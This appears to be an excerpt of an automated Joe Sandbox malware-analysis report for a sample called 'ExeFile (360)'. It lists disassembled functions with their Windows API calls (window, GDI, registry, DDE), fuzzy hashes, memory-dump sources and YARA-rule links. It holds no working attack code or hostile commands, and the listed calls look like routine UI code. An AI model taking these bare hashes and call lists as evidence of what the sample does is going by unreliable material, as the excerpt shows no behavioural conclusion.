Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Load$AcceleratorsMenu
String ID:
API String ID: 144087665-0
Opcode ID: 695349e6f8f2e100c82e39f2a70801ac08bac9f0ecb22a6c52ad429aa65a9e0d
Instruction ID: f4e09137be8d9ae0b396c5bea0ba359cbad7e3e2b92c57a68bb97ef9d58b0705
Opcode Fuzzy Hash: 695349e6f8f2e100c82e39f2a70801ac08bac9f0ecb22a6c52ad429aa65a9e0d
Instruction Fuzzy Hash: 3A21E8B1401B18DFD670AF66894097BF3F8FF08611740542FEE8682A51D679FC40DB28

Function 0043C6E8 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0043C71B
GetLastActivePopup.USER32(?), ref: 0043C72A
IsWindowEnabled.USER32(?), ref: 0043C73F
EnableWindow.USER32(?,00000000), ref: 0043C752
GetWindowLongA.USER32(?,000000F0), ref: 0043C764
GetParent.USER32(?), ref: 0043C772

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: eee620e7b871147419da0142791c45a33b4d565f6f8fd721ad0bb26c0ae4cc8c
Instruction ID: d42782d0c65ba8a5ee920ae6b0e63e040d125f38c4b68d33ec6226c1ee9eda0b
Opcode Fuzzy Hash: eee620e7b871147419da0142791c45a33b4d565f6f8fd721ad0bb26c0ae4cc8c
Instruction Fuzzy Hash: 0F11E03260172757C6215A6A8CC4B3BB2989F6DBA2F191126EC00F7306DB28DC014FED

Function 00448648 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00448661
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00448678
DPtoLP.GDI32(00000000,?,00000001), ref: 0044869A
DPtoLP.GDI32(00000000,00448643,00000001), ref: 004486AB
ReleaseDC.USER32(00000000,00000000), ref: 004486C7
CreateFontIndirectA.GDI32(?), ref: 004486D1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 3a77f1974f639602f5c362874c0ec639bf8819799c91fb04a6cb83146aabd764
Instruction ID: 173ed1e8cd7dea14b6d3fd345813a2435962e805390e4fbe429057551c6c2586
Opcode Fuzzy Hash: 3a77f1974f639602f5c362874c0ec639bf8819799c91fb04a6cb83146aabd764
Instruction Fuzzy Hash: C4111C76900219AFEB00DBE5DC85EBFBBBCFB44311F00441AF501EB291DBB4A9009B64

Function 004060C0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000003,?,0000000A), ref: 004060D9
MulDiv.KERNEL32(00000007,?,0000000A), ref: 004060EC
MulDiv.KERNEL32(00000003,?,0000000A), ref: 004060FF
MulDiv.KERNEL32(00000007,?,0000000A), ref: 00406115
MulDiv.KERNEL32(00000007,?,0000000A), ref: 00406132
MulDiv.KERNEL32(00000003,?,0000000A), ref: 00406148

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0727de7ce3e9d76baa5378a3f7edcedaf9f0d75af5127c44b02c0d4a9a5edcf8
Instruction ID: bb6404df36254403df8aae135200e927aface91335a7be00d5aa255dd14de4b0
Opcode Fuzzy Hash: 0727de7ce3e9d76baa5378a3f7edcedaf9f0d75af5127c44b02c0d4a9a5edcf8
Instruction Fuzzy Hash: 951182B2B983076EF314CE68CC92B7A77D9DBD4B01F04483AB254CB2C1D9A49C055B62

Function 00406020 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000056,?,00000064), ref: 00406039
MulDiv.KERNEL32(0000000E,?,00000064), ref: 0040604C
MulDiv.KERNEL32(00000056,?,00000064), ref: 0040605F
MulDiv.KERNEL32(0000000E,?,00000064), ref: 00406075
MulDiv.KERNEL32(00000056,?,00000064), ref: 0040608F
MulDiv.KERNEL32(0000000E,?,00000064), ref: 004060A4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344bf3163844c302cff09d96a9b06064cff882e42c00e7a454632a5920e4cea6
Instruction ID: a549dea027f1b1e634c947c5799fc03fc274ad1e161c203849f357d2fa2431aa
Opcode Fuzzy Hash: 344bf3163844c302cff09d96a9b06064cff882e42c00e7a454632a5920e4cea6
Instruction Fuzzy Hash: 84115E73B947472AF310CA68CC51B7B26DADB84B11F04083A7754DB2C2D9A588059B61

Function 00445FB3 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00445FBC
GetWindow.USER32(00000000), ref: 00445FC9
GetWindowLongA.USER32(00000000,000000F0), ref: 00445FFE
ShowWindow.USER32(00000000,00000000), ref: 0044601A
ShowWindow.USER32(00000000,00000004), ref: 00446032
GetWindow.USER32(00000000,00000002), ref: 0044603B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 0be0b9016aefe7334e59465903207f4c89b4aead4e307e64401690cffdab9171
Instruction ID: 8941d06831ba99196f22bcedd232bc9ec8759768227f80a11045fd5f1af0679d
Opcode Fuzzy Hash: 0be0b9016aefe7334e59465903207f4c89b4aead4e307e64401690cffdab9171
Instruction Fuzzy Hash: 6611E531506F556BF731D628CC49B2F76889F627A3F62025AF50492281CF2CDC8582AE

Function 0043C885 Relevance: 9.1, APIs: 6, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0043C8A9
RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 0043C8C9
RegCloseKey.ADVAPI32(00000000), ref: 0043C8FB

Part of subcall function 00449C5A: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00449C88
Part of subcall function 00449C5A: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00449CAB
Part of subcall function 00449C5A: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00449CCA
Part of subcall function 00449C5A: RegCloseKey.ADVAPI32(?), ref: 00449CDA
Part of subcall function 00449C5A: RegCloseKey.ADVAPI32(?), ref: 00449CE4

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0043C919

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
String ID:
API String ID: 1886894508-0
Opcode ID: f243319c1f572cc96b11a5df531518f9e80369ef00b02c5844138caa19e92b08
Instruction ID: 878e0cc99e2b1c1bf196f94c58f26c6e0ff5094f5c7fa11df932309310ba5c80
Opcode Fuzzy Hash: f243319c1f572cc96b11a5df531518f9e80369ef00b02c5844138caa19e92b08
Instruction Fuzzy Hash: 8111A732001A15EBDF262F60DC48BAF3A65FF08762F054026F915A9162C739CA119B99

Function 00450FDA Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,0000000A), ref: 00450FEF
GetDeviceCaps.GDI32(?,00000008), ref: 00450FF8

Part of subcall function 0045105C: GetViewportExtEx.GDI32(?,?,?,?,?,00450F86,?), ref: 0045106D
Part of subcall function 0045105C: GetWindowExtEx.GDI32(?,?,?,?,?,00450F86,?), ref: 0045107A

SetMapMode.GDI32(?,00000001), ref: 00451010
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0045101E
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0045102E
IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 00451049

Part of subcall function 00450E55: GetViewportExtEx.GDI32(?,?,?,?,?,004507C1,00000001), ref: 00450E6C
Part of subcall function 00450E55: GetWindowExtEx.GDI32(?,?,?,?,?,004507C1,00000001), ref: 00450E79
Part of subcall function 00450E55: GetDeviceCaps.GDI32(?,00000058), ref: 00450EE4
Part of subcall function 00450E55: GetDeviceCaps.GDI32(?,0000005A), ref: 00450F01
Part of subcall function 00450E55: SetMapMode.GDI32(00000000,00000008), ref: 00450F27
Part of subcall function 00450E55: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 00450F38
Part of subcall function 00450E55: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 00450F49

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
String ID:
API String ID: 1729379761-0
Opcode ID: 84b1ebf9667a312efe1544aade80d7f24e4a76cd84a20eda498f3ece6cbfee20
Instruction ID: 21c8473dbafd31e0d41cea6f9e9061b888397d507f374b5c07e9fffb693905f3
Opcode Fuzzy Hash: 84b1ebf9667a312efe1544aade80d7f24e4a76cd84a20eda498f3ece6cbfee20
Instruction Fuzzy Hash: 33016D31500704BFCB215B6ACC0AE6FBFBDEF85B21B00462DF116922B1CA71A8008B64

Function 00446BED Relevance: 9.1, APIs: 6, Instructions: 53stringwindowCOMMON

Download Yara Rule

APIs

UnpackDDElParam.USER32(000003E8,?,?,?), ref: 00446C0C
GlobalLock.KERNEL32(?), ref: 00446C14
lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00446C27
GlobalUnlock.KERNEL32(?), ref: 00446C30
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 00446C48
PostMessageA.USER32(?,000003E4,?,00000000), ref: 00446C55

Part of subcall function 0043393A: IsWindowEnabled.USER32(?), ref: 00433944

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
String ID:
API String ID: 2333435275-0
Opcode ID: f5e058d97bad4948c70f4097ff8d8859adb819d862ca4f46861389a4e23dcad4
Instruction ID: 0803479a1b70f4e9b21309829bc9b5a2fc403b67432568826f4a4a2fb6ac37e9
Opcode Fuzzy Hash: f5e058d97bad4948c70f4097ff8d8859adb819d862ca4f46861389a4e23dcad4
Instruction Fuzzy Hash: DE01C432600208BFDB11ABA0DD89EEF7B7DEF48316F004179B90DD6162DA749E04DB64

Function 00439113 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00439116

Part of subcall function 00438FB8: GetWindowLongA.USER32(00000000,000000F0), ref: 00438FC9

GetParent.USER32(00000000), ref: 0043913D

Part of subcall function 00438FB8: GetClassNameA.USER32(00000000,?,0000000A), ref: 00438FE4
Part of subcall function 00438FB8: lstrcmpiA.KERNEL32(?,combobox), ref: 00438FF3

GetWindowLongA.USER32(?,000000F0), ref: 00439158
GetParent.USER32(?), ref: 00439166
GetDesktopWindow.USER32 ref: 0043916A
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0043917E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: 3707441d8d557da03bb6c51865ce9bf918d9f952b10a85494172005b5ea00604
Instruction ID: de47f1c619ba4b0e37b90a0f699b891cb21fde98568216034c33501097e353e3
Opcode Fuzzy Hash: 3707441d8d557da03bb6c51865ce9bf918d9f952b10a85494172005b5ea00604
Instruction Fuzzy Hash: D1F0F432201B2232EB2327285C8CB7F91595FC9B56F551226F505B73C1DFB8CC0261AC

Function 0044B7B2 Relevance: 9.0, APIs: 6, Instructions: 48registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0044B7BF
RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 0044B7D3
RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 0044B7EC
lstrlenA.KERNEL32(?), ref: 0044B7F9
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 0044B80E
RegCloseKey.ADVAPI32(?), ref: 0044B819

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Valuelstrlen$CloseCreate
String ID:
API String ID: 306239685-0
Opcode ID: 131b751d636bcbec08f08febb724e09ab1dc9fb79a580d1c16dd1920e60fa43f
Instruction ID: ef9b1c4e49e41a5c70d86dc1a35978077bc72b779a1169d472d35a1799e8c370
Opcode Fuzzy Hash: 131b751d636bcbec08f08febb724e09ab1dc9fb79a580d1c16dd1920e60fa43f
Instruction Fuzzy Hash: 11011A36150608FBEF112FA0EC05FBA7B69EF14792F108425FE1AD81A1D771C9609BD8

Function 0043902D Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0043903C
GetWindow.USER32(?,00000005), ref: 0043904D
GetDlgCtrlID.USER32(00000000), ref: 00439056
GetWindowLongA.USER32(00000000,000000F0), ref: 00439065
GetWindowRect.USER32(00000000,?), ref: 00439077
PtInRect.USER32(?,?,?), ref: 00439087

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 9bcfd3ae1db5a73f161b0e14fa55500c721cc72d649549a5c5fc36c097c427f8
Instruction ID: 853e6484dfe5d056b7cad71a33cc0d630b57524b56185d7ead80c9f845e09768
Opcode Fuzzy Hash: 9bcfd3ae1db5a73f161b0e14fa55500c721cc72d649549a5c5fc36c097c427f8
Instruction Fuzzy Hash: 4E017C32501629BBDB215B64DC08EBF3738EF49312F404026FA19D21A5E774E9028A98

Function 0043486B Relevance: 9.0, APIs: 6, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 00434878
GetSystemMetrics.USER32(0000000C), ref: 0043487F
GetDC.USER32(00000000), ref: 00434898
GetDeviceCaps.GDI32(00000000,00000058), ref: 004348A9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004348B1
ReleaseDC.USER32(00000000,00000000), ref: 004348B9

Part of subcall function 0044B3EB: GetSystemMetrics.USER32(00000002), ref: 0044B3FD
Part of subcall function 0044B3EB: GetSystemMetrics.USER32(00000003), ref: 0044B407

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 938e63ef5a9c4b3a2f3eaeb401f15f2bba12f789b7cb1cb2c75280e40007b8b7
Instruction ID: d29fc66b261e26b9487e020c8fc24eb800f62fdc05fd7bcff6d4301c46adb28b
Opcode Fuzzy Hash: 938e63ef5a9c4b3a2f3eaeb401f15f2bba12f789b7cb1cb2c75280e40007b8b7
Instruction Fuzzy Hash: 9FF0B474540B40AEF2206F728C99F2BB7A4EB84752F10452FF60146292DA74E801CFA5

Function 00416B65 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 280memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416B6A
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00416C86
CoTaskMemFree.OLE32(?,?,00000000), ref: 00416E6D

Strings

(, xrefs: 00416E61
, xrefs: 00416D42

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID: $(
API String ID: 1522537378-55695022
Opcode ID: 0eacc25bc73871e5ae2ef59cb080997c6f6838725387d520292fc4cb2435b8e6
Instruction ID: 1d5ba6edd04645835d7e8d3f2d925ac08dd773a77b8561805b69193e0ea69d1e
Opcode Fuzzy Hash: 0eacc25bc73871e5ae2ef59cb080997c6f6838725387d520292fc4cb2435b8e6
Instruction Fuzzy Hash: 16B11770A003099FCB14CFA9C984AAEBBF5FF88304B20455EE456EB251D775E985CF54

Function 0043E864 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000000,?), ref: 0043E95B
OffsetRect.USER32(?,?,00000000), ref: 0043E971
SetCapture.USER32(?), ref: 0043E9BC
RedrawWindow.USER32(?,00000000,00000000,00000180,00000000), ref: 0043E9DB

Strings

zE, xrefs: 0043E995

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: OffsetRect$CaptureRedrawWindow
String ID: zE
API String ID: 1977905163-342539153
Opcode ID: 5b10baf386d8715355844161dc6bbf590d0efd6b7415f30635df3d4934d0ffc8
Instruction ID: e4e5b44c66d7276d0b4c28df5c648b314f7920e33294e345228b3f4e5bc43db3
Opcode Fuzzy Hash: 5b10baf386d8715355844161dc6bbf590d0efd6b7415f30635df3d4934d0ffc8
Instruction Fuzzy Hash: 8D5190B12007059FD7249F29D848FABB7EAFF88700F04492EF59AC7281DB74A9458B54

Function 00441D7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00441DF6
GetWindowRect.USER32(00000000,?), ref: 00441E01
IntersectRect.USER32(?,?,?), ref: 00441E4C
IntersectRect.USER32(?,?,?), ref: 00441EA0

Strings

v$D, xrefs: 00441DE1, 00441DE4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID: v$D
API String ID: 123605412-795126239
Opcode ID: 9fa6d27799b9436666cb752709461f5c5c9d0518f293ad7681bc0354f54a1649
Instruction ID: 9c4eafb9ad0362a7f2b037b316f9b39c2c6bda215effce0e5dc9f7839757287e
Opcode Fuzzy Hash: 9fa6d27799b9436666cb752709461f5c5c9d0518f293ad7681bc0354f54a1649
Instruction Fuzzy Hash: 695195B6900209DFDF44DFA8C5C4A9EBBF5FF08314B144596E905EB21AE634E981CB54

Function 00430F90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

